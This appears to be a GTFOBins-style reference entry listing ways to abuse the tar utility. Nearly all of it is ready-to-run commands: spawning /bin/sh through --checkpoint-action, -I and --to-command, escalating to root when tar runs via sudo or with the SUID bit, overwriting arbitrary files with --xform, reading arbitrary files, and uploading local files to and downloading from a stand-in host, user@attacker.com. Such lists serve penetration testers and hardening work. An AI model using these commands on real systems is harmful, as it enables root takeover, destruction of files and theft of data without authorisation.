This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
This function can be performed by any unprivileged user.
tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'
This function can be performed by any unprivileged user.
echo '/bin/sh 0<&1' >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar xf /path/to/temp-file.tar --to-command /bin/sh
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
echo '/bin/sh 0<&1' >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar xf /path/to/temp-file.tar --to-command /bin/sh
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
echo '/bin/sh 0<&1' >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar xf /path/to/temp-file.tar --to-command /bin/sh
This executable can write data to local files.
This function can be performed by any unprivileged user.
echo DATA >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
echo DATA >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
echo DATA >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@
This executable can read data from local files.
This function can be performed by any unprivileged user.
tar cf /dev/stdout /path/to/input-file -I 'tar xO'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
tar cf /dev/stdout /path/to/input-file -I 'tar xO'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
tar cf /dev/stdout /path/to/input-file -I 'tar xO'
This executable can upload local data.
This function can be performed by any unprivileged user.
tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh
This executable can download remote data.
This function can be performed by any unprivileged user.
tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh